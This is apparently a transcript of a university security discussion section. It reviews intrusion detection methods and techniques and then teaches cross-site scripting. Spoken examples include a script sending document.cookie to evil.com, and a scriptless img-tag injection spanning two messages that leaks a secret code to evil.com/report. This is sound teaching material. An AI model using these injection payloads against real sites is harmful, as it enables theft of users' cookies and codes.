All right, so we are getting into our last section. We're getting into our last module of this course, which is web security, having to deal with websites and web browsers and how and some like common attacks that we see in the real world. There is technically one more sort of sub module right after this, which is miscellaneous topics. I believe we're doing stuff like contact tracing for COVID-19 as well as possibly some more interesting cryptographic protocols, but we'll see. That's still being decided. But for now, we still have a couple more topics and lectures on web security. So we'll get started with that. Actually, I do want to just briefly review intrusion detection, like NIDS and HIDS and all those. Those are technically part of network security, I think. So I just wanted to give a brief review of that because there is a discussion question on it for today. So we have, I believe it was 3 sort of intrusion detection methods and 4 intrusion detection techniques. The method is kind of like where in the flow of the request do you put the intrusion detection system, and then the technique is what it actually uses to flag or not flag things as suspicious or not suspicious. So we went over 3 main methods. We've got the NIDS, which sort of sits in between the host and the internet. So it analyzes all the traffic passing in between. And the advantages of this are that they're cheap and they're easy to set up. You can set up a single NIDS that basically analyzes all the traffic going to, say, all the hosts in your back end. So you only need one NIDS in order to provide security for the entire network. The downside, and it's quite a big downside, is that it doesn't have the host context. So we were talking about in lecture how the NIDS might, say, interpret this string of characters, maybe like escape sequences or something, differently from the host itself. So if it sees those escaped characters, maybe it won't think that it needs to be parsed to, I don't know, etc password or something, but the host will parse it. So there's a possibility for a discrepancy between how the NIDS interprets things and the actual hosts handle things. So on the other end of the spectrum, we've got HIDS, which is host-based intrusion detection systems. Essentially what this does is it sits on the host itself and it analyzes the requests as they come in. This is usually something that's on the web browser, or maybe it's part of the operating system. It's generally more difficult to set up for each machine, mainly because you need to do it for each machine. You can't just kind of put it on the network and it will cover the entire network. But it does have the host context. So there's no worrying about, oh, is my security system going to interpret things differently from the web server? Because in this case, they're the same thing. And finally, we talked about logging, which is essentially no live detection, but you'll log it all and analyze it later. This is the cheapest option, mainly just because you dump things to a log and then look at those logs afterwards. There's no like real-time analysis going on. And of course, the biggest downside is that it is not real time. So are there any questions on these 3 main methods? Cool. Okay. Appreciate the response. It does let me go a little bit faster. And then we've got our 4 sort of intrusion detection techniques. I think some of these actually blend into each other a little bit, but I'll just go through them really quickly. We've got signature-based intrusion, signature-based detection, which is essentially we will flag attacks that we've seen before. So there are like publicly available databases of certain snippets of code, or just we know what previous attacks are like just because we've seen them before. So we can kind of archive them and then compare the current requests against that database. And this is vulnerable to new attacks, obviously, so it doesn't generally this one, yeah, actually I won't say anything beyond that. We've got anomaly-based detection, which is essentially flag anything that looks different from normal traffic. And the main thing we were talking about this one is that it suffers from the base rate fallacy. While this will probably detect most attacks, it will have a pretty high false positive rate because not everything that looks different is necessarily malicious. We've got specification-based detection, which is essentially we're going to declare what is allowed, and anything that is not within this really constrained spec is going to be flagged as malicious, shut down or something. These are difficult to develop. I've put the Project 2 spec here because we spent quite a bit of time thinking about how can we tweak the spec to make it specific enough for you guys to implement, but also give you enough freedom, and also like, it's difficult to develop these things and it takes time. And then finally, we've got behavioral detection, which is a bit different. It doesn't look at any of the, say, traffic or anything itself, but it will look at, say, what are the results of processing this query? Was there some sort of file access, or were extra processes created? So I guess on a scale of blacklist to whitelist, we've got signature based is the most blacklist, specification based is the most whitelist, and anomaly based is, somewhere in between. It just kind of learns what is normal as it goes along. And behavioral is like its own thing. So are there any questions on that before we get into the first question? Cool. Okay then. Oh, actually. Is blacklist a default deny and whitelist default allow? So a blacklist essentially says if it is on this list, then you don't, allow it. So a blacklist would actually be a default allow, because your rule is, okay, if it's not on this list, then by default you allow it. On the other hand, a whitelist is a default deny, because essentially it works is if it's not on this whitelist, then deny it. So only if it's on the whitelist will you allow it. So does that make sense? Does that answer your question? Yeah. Okay. So we can get into the first question. Essentially what this is it's going to be giving you a bunch of scenarios and asking you which one would be best. So let me pull up my iPad. You've got, I think, let's go through the first 4 parts. We can spend a couple minutes on that, and I'll pause the recording so you guys can talk if you want. And then we will talk about it. So yeah, there's the button. Zoom is overly frustrating sometimes. There we go. This first part says that FooCore is hosting a web application over HTTPS and needs to detect any use of blacklisted characters in real time. So what would you say would be the best method for this one? Oops.
HIDS, because it's HTTPS, so it's encrypted, and it's also real time. So
right. So you want a HIDS because it's encrypted. So reading the network traffic doesn't help you at all. And also you want it real time. So this one would be HIDS, you're right. The second one, FooCore is hosting a web application over HTTP and wants to pass all user traffic through an anomaly detection algorithm, which uses some computationally expensive machine learning. However, the web application needs to have low latency when many users are online during the day. So what would be the best method for this one?
Logging.
Okay. How come?
Because when there's a lot of traffic, then in order for the algorithm to work, it takes up a lot of computing power, right? So we don't want to overload the network.
Right, yeah. So the keywords of this question would be that it needs to be low latency, but our algorithm itself is computationally expensive. So these two combined, you wouldn't want to run any real-time analysis during the day, because that would make the website slow down. So what we do is we'll log all the traffic and then we'll run it at night. That's right. And the last one, FooCore uses SMTP for email and wants to be able to quickly detect phishing attacks against any of their internal computers. And SMTP is an unencrypted protocol.
NIDS, because it has to be quick, so it implies real time, and it's unencrypted.
Right. So just scanning through the question, we see that SMTP is unencrypted and needs to be done quickly, which I believe was over here. Yeah. So it's not too difficult. Are there any questions on these questions, on these answers? They're all correct, by the way. Okay. And so for part D, we've actually got a bit of a different scenario. FooCore sets up a NIDS, which essentially acts as a man in the middle for TLS. It will decrypt TLS traffic, inspect it, and then re-encrypt it before sending it along to someone in the internal network or something. So it asks, what security principle does this violate?
Least privilege.
Least privilege, okay. How would you explain that?
Because If, say, an employee wants to do some sort of login where they have to enter sensitive information, then everything they enter would have to first go through the NIDS. So basically, the NID should only have enough privilege to monitor basically monitor the packets, right? But then now it's also getting all the information that it also doesn't need.
Well, I guess you could argue that, like, because the NIDS needs to be able to inspect the network traffic in order to perform its functionality. And least privilege is basically just saying don't give anything more than it needs to do to handle its responsibility. So least privilege, I think there's a slightly related one that might be more applicable. Daniel, do you have any ideas? Or Astro, you too?
No, I don't.
Okay.
I don't think I know this.
Yeah, no worries. I mean, the security principles were a while ago. The one we actually have down here is separation of responsibility. So right now, what we have essentially is this, thing through which all network traffic is passing through. And so it becomes a single point of failure. And if that single point of failure is compromised, then what you end up with is your entire system is vulnerable. So what separation of responsibility says is basically you don't have this, single point of failure, which this NIDS is. So the one that we have for at least on the answer sheet, and I'm sure you could like argue least privilege as well and get points on the exam if there were a question like this. Wow, how do you spell separation? Separation.
I think it's an A.
Is it? Oops. Separate. Interesting. Okay. Separation of responsibility. I'm definitely spelling these wrong. It's responsibility? Oh, okay. Well. All right, now I have to look this up. Yeah, okay. Nope. Responsibility. Oh my gosh. Oh, I did get it right. Okay. Sorry, I don't write in printing very often. My cursive is completely legible, which is why I try to remember to print, but sometimes Anywho. But yeah, so does this make sense? Does that make sense? Why this is the answer?
Yeah.
Okay. Then I guess we can take a look at the last 4 parts of this question. This one's talking about the different techniques, and I will say that for some of these you could actually use multiple. So if you can think of multiple answers that would be, valid, feel free to put all of them down. But we'll spend a couple of minutes on this. Whoops, that's one way to start a recording. Yeah, so this question is just giving you a bunch of scenarios, and it's saying which technique would be best for each scenario. So the first one, FooCore wants to detect script kiddies, and that's just a term for people who just download malware off the internet and run it against servers in the hopes that it will work. So which one will be best for this scenario?
We said any of them would work, but that signature-based would be most appropriate because it's the cheapest option, and this is what it's specifically for.
Yeah. So, yeah, you're correct that all of these will work. I mean, yeah, a publicly available malware, you already know how it behaves. You know that, malware in general is weird, and it will definitely fall outside, specifications. All of these would work. But since this question asks which one is the best one, then yes, this one is signature-based. Signature-based. Okay, how about for number 2? FooCore wants to detect a seasoned elite. I actually don't know how that's pronounced. Elite hacker, whatever. Who uses crafts. Who crafts custom exploits for each attack.
I think we thought it was all of them but signature based because they all can detect custom exploits.
All of them can? Oh, wait, no, all of them. Sorry, you said all of them except signature
Except for
based?
signature
Okay,
based.
yes. Okay. Yeah, so for this one, really all of them would work. For our answer sheet, we put anomaly and anomaly, as well as behavioral. Oh goodness. But yeah, they all would work. Since it doesn't really sound like FooCore has any like, they haven't specified anything in specific that is or is not allowed. I think that's why you won't see a specification based on the answer sheet, but I definitely could see the argument for that. So for G, FooCore wants to detect publicly. I'm pretty sure that's not how this is spelled either. FooCore wants to detect publicly available malware that an attacker manually tweaks to avoid signature checks.
Oh,
I think again the last three should work.
Yeah. Is there one that you think? What's the difference between like completely custom exploits and just say something you've downloaded off the internet and you just changed around a couple bytes to make sure it doesn't get detected by signature checks?
Well, then you should know how it behaves because it's publicly available.
Yeah.
So I guess.
So sorry, I interrupted you. You were definitely on the right track. I think.
Did I cut out?
Sorry.
Behavioral.
Yeah. So in this case, the best one would be behavioral. And like this because like you said, it's publicly available, so we know what it does. We know how it's going to work. We know what the exploit is going to target. They just tweaked around a couple bytes. So this in this case it would be behavioral because we know what it's going to do, so we can just defend against that. And for this last one, FooCore wants to detect any attempts by their employees to access the protected Etsy password file.
I think behavioral would work again because whenever outbound traffic sends the file contents, you can detect that.
Behavioral, I guess technically it'd be more like you detect some sort of system call that opens the Etsy password file. But you're definitely on the right track. This is behavioral. It's also this technically also falls under specification based. Oops. This technically also falls under specification based because essentially you can define that anything that tries to access this file is outside of the spec and thus is not allowed. But are there any questions on any of these? I know this is a little bit more wishy-washy than something like crypto was, but does this all make sense?
Yeah. Yes.
Okay. So this next question is actually oops. This next question is actually kind of something that I don't know. Have either of you watched the lecture for today yet?
No.
Actually, I think the lecture for today is SQL injection, so it doesn't matter either way. But this one is sort of related to cross-site scripting, which you won't see until I believe it's tomorrow or Wednesday. The reason for that is just because I think there was a bit of weirdness with the discussion sheets. So what I'm going to do is I'm going to give a very, very brief overview of XSS, and then we shall jump into this next question. I don't think it should be too difficult to understand. It's essentially string replacement, but once my slide loads, I shall show you what I'm talking about. So XSS, it stands for cross-site scripting. And I think the best way to explain it is just to write some example code. So this is in Go. I wrote it in Go mainly because I've been working with Go for the last couple days preparing project 3. But essentially what you can have is you can have this web server that will serve a dynamic web page. So instead of just loading up an HTML file and sending it to you, it can generate this HTML on the fly and then send that back to you. So here what we have is a function that takes in the request and the response, and it will read the name from a query parameter. So that's just that question mark name equals something. And then what it will do is it will generate this web page with this HTML and body tag saying hello and then %s, which is replaced with this name. So what happens if I do something like, say I query it with name equals Nicholas, it will take the query parameter and then substitute Nicholas as this name here. And then I get back to this HTML page, hello Nicholas. Now this is a bad idea, mainly because if you don't handle this properly, I could set this query parameter to something like, oh, I want it to be the bold tag and then Nicholas and then a closing bold tag. And what it will do, it will just take that entire string and it will plop it into this %s. So suddenly the HTML that you get back is HTML body, and then you have this bold tag inside, which makes it bold. Now that's not too bad, but the reason this is called cross-site scripting is because we can insert a script tag in here. We talked about script tags in lecture, I think it was yesterday, I hope. Not yesterday, Thursday. And essentially these will run any arbitrary JavaScript that you put in, and it will have the origin of the site itself. So if I put in, say, name equals opening tag script alert1 close tag script, then suddenly the HTML that is generated has the script tag, and the browser will just see that and has no reason to think that it isn't just another script in the page. So we'll execute it, and I get this alert that pops up. And essentially, once you have XSS, once you have an XSS vulnerability, you have completely broken, same origin policy. This runs with the origin of the page, so I could say, query the cookie. So I set the script to be something that just sends document.cookie to evil.com. So does that make sense very conceptually what XSS is? Yeah. Are there any questions? Okay.
Yeah.
Okay. And the last thing I wanted to say is just that it doesn't have to be a query parameter. This would be something like reflected SSS, which you'll learn about in a couple days. But it could also be like, say you're on a blog or something and you read the comments from the database and then you put them in the HTML and send them back. So say I have the ability to post a comment into the SQL database. So when it's read out, it will get put into the HTML here, and again, I have an XSS vulnerability. So this would be an example of a stored XSS where I save it. I can somehow get XSS into the database, and then when it's loaded back, then the scripts are run. The overarching idea here essentially is just that because this is string replacement and it doesn't the string parser or the string replacer here doesn't have any idea that this is HTML and that it needs to be smart about it, which is why we can just insert arbitrary HTML here, and that's why we get the XSS vulnerability. So just the last question on the discussion sheet is ironically called cross-site not scripting, I think. Let me see what the question name actually is. Yeah, it's called cross-site not scripting. And essentially the scenario that we have set up here is that we have this page that is some messaging service. that works in raw HTML, I guess. And essentially, we have this Mallory here who is evil. Mallory's always evil, I guess. And she somehow wants to get this Steam code. Now, none of this is sanitized, so essentially everything that Mallory says will be rendered directly as HTML without doing any escape characters. So we somehow need to choose messages here and here. And here that will somehow let us learn what this code is here. We don't know what it is, but we have control over the HTML that's surrounding it. So I'll just leave it. Actually, no, I'll pause the recording, and you can think about how you would do it. Yeah. So one thing I forgot to mention before I started the recording, which I guess if you're watching the recording was seconds ago. But what this page has done is that they've somehow disabled all JavaScript from running at all. There is actually a header for this that you can set in HTTP. I think we go over that at some point. But essentially, we can't use script tags. We can't somehow put scripts and images and so on and so forth. So we have to find some other way of getting this verification code to Mallory. So why don't you talk me through what or just where you started thinking you could accomplish this?
Well, Mallory can inject HTML before and after the verification code. So what Mallory could do is insert, like, for example, the start of the body before the verification code and then the end of the body afterwards.
What do you mean the start of the body?
Like, isn't it like less than body greater than, and then on the second message, like less than / body greater than or something?
Oh, I see. I think the assumption of this site is that, all of this is within these, opening and closing, body tags within the larger site. So, yeah, I see what you're saying. Yeah, I think this is already assumed to be surrounded by these opening and closing body tags.
Oh,
Is there some what other commands are you allowed to do in?
There are a lot of HTML tags. Yeah, there are a lot of HTML tags. None of them allow really arbitrary command execution like JavaScript does, but yeah. I will say maybe this might help you a little bit. When in the earlier example we had say like script, and then we would send a request using the fetch API, which is what this is called. Say evil.com. Oh, what can I do? Evil.com / say like, I don't know, report. And then send cookie as a query parameter. So cookie equals plus document.cookie. So we need to somehow find a way to make a request to this evil.com. I'll finish closing these tags. Yeah, we need to somehow find a way to make a request to evil.com without, using any scripts. So just looking at this, after we load this HTML, is this browser going to need to load anything else in order to display the page? Let's just ignore what Mallory is sending right now.
It will load
the thank you, yeah.
Yeah, so
Right.
we know that the browser will automatically make a request to load this image. So it makes a request to whatever is in this source tag.
So could we make another image request, but then include the message as like the cookie or something?
Okay, so how would we need to write our HTML in order to do that? I think you're on the right track.
You could do like image source in the first message is equal to um, the long, like the evil.com thing.
Okay. Evil.com, let's just say /report, just for fun. And then what?
And then, what was how would you, and then you would then specify the cookie, right?
Yeah, I guess in this case, be like code. It doesn't really matter. I assume the attacker would have it set up correctly. Code, and then what would we do?
And you would just leave it there and then complete the image request in the second response.
Yeah. So what do you just want to read out what this what the actual code would be here?
I don't remember. um, you would then just close the quotes, right?
Mm-hmm.
And then just close the bracket.
Yes, exactly. So essentially what we've done here is we realized we don't have to, contain the entire tag that we're injecting within one message and then do the same thing in the other. We can actually make a tag that spans, across these two messages. So what we've done here is we've crafted this image, and we know that the browser will automatically make requests to get the source of this image. And we've crafted it such that it will see this part here as the entire URL. It has spaces in it, but that should be fine. It is fine. If you try it in your own browser, it should work. So what Mallory will see is she'll see, oh, there was some request to report, and it says code equals, and then all of this HTML that was supposed to be printed out, and then the little extra Mallory at the end. But the key part is that she did in fact get this code here, so she is able to, I don't know. In theory, I guess the situation was that someone's slacking off at work, so Mallory can go, I don't know, log into his account or something. But does that make sense how this attack works?
Yeah.
Mm-hmm. Yeah, I think this is pretty cool, mainly because it doesn't require any scripting. It just kind of, I think something just broke. It just kind of, requires that you're able to inject any sort of HTML at all. So I guess the lesson to be learned here is that you should, well, the real lesson is that you should never, try to escape HTML yourself. There are always libraries for that for every language ever. But you should never, treat a HTML injection of any sort lightly. But that's all we have for this discussion sheet. Were there any last questions on anything?
I'm good.
I'm good too.
Okay. In that case, I shall see you Wednesday, and I think our discussion sheets will be a little bit more in line with lecture again, starting on Wednesday. So, but yeah, see you.
Oh, thank you.